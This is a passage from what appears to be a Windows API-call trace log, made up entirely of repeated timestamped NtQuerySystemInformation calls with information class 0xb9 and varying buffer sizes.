(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0288.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0288.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x20, ResultLength=0x0) [0288.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0288.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0288.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0288.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0288.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec8, Length=0x58, ResultLength=0x0) [0288.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0288.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0288.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0288.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0288.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0288.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0288.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0288.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0288.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0288.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0288.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0288.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0288.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0288.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0288.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0288.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x58, ResultLength=0x0) [0288.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0288.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0288.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0288.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x28, ResultLength=0x0) [0288.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0288.378] NtQuerySystemInformation 